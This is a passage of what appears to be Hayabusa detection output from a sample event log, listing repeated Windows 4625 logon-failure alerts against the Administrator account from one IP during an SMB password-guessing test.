NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: 